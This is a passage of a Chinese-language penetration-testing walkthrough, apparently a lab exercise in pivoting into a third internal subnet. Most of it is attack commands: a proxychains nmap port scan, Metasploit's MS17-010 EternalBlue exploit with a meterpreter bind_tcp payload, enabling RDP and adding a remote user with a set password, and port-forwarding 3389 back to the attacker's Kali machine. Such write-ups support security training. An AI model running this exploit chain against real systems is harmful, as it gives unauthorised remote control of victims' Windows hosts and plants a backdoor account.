文章插图
探测到第三层网段的存活ip :10.10.10.101
文章插图
proxychans 启动nmap对10.10.10.101的1-500端口扫描,执行
proxychains nmap -sT -Pn -p 1-500 10.10.10.101
文章插图
发现445端口开启
文章插图
尝试使用ms17-010
use
windows/smb/ms17_010_eternalblue
set rhost 10.10.10.101
set payload
windows/x64/meterpreter/bind_tcp
set lport 4466
文章插图
Run,存在445漏洞
文章插图
执行成功,返回会话
文章插图
开启3389远程桌面
run
post/windows/manage/enable_rdp 开启远程桌面
run
post/windows/manage/enable_rdp USERNAME=zzy PASSword=123qwe!@# 添加远程用户
文章插图
将3389端口转回kali本地5555端口
portfwd add -l 5555 -p 3389 -r 10.10.10.101
文章插图
Win10远程桌面连接
文章插图
登陆成功
文章插图
推荐阅读
- 微信QQ头像,可以自定义啦
- 尿路感染喝槐米茶好吗,槐米茶能天天喝吗你知道槐米茶的功能功效吗
- 历史上的今天10月21日,历史上的10月20日
- 一文带你搞懂RPC到底是个啥
- 家居风水之财运风水
- 翡翠手镯|某女子买了两块翡翠手镯,价格还不到两千块钱,你说这是真的吗?
- |关于赚钱这个道理你一定要懂,赚钱能力不仅仅是考验智商
- 传奇3|传奇3:三职业究竟谁更强一点你知道吗?
- 减肥健美操,你跳对了吗
- 中草药6000种图解,图解教你正确的玉器挂件礼品绑法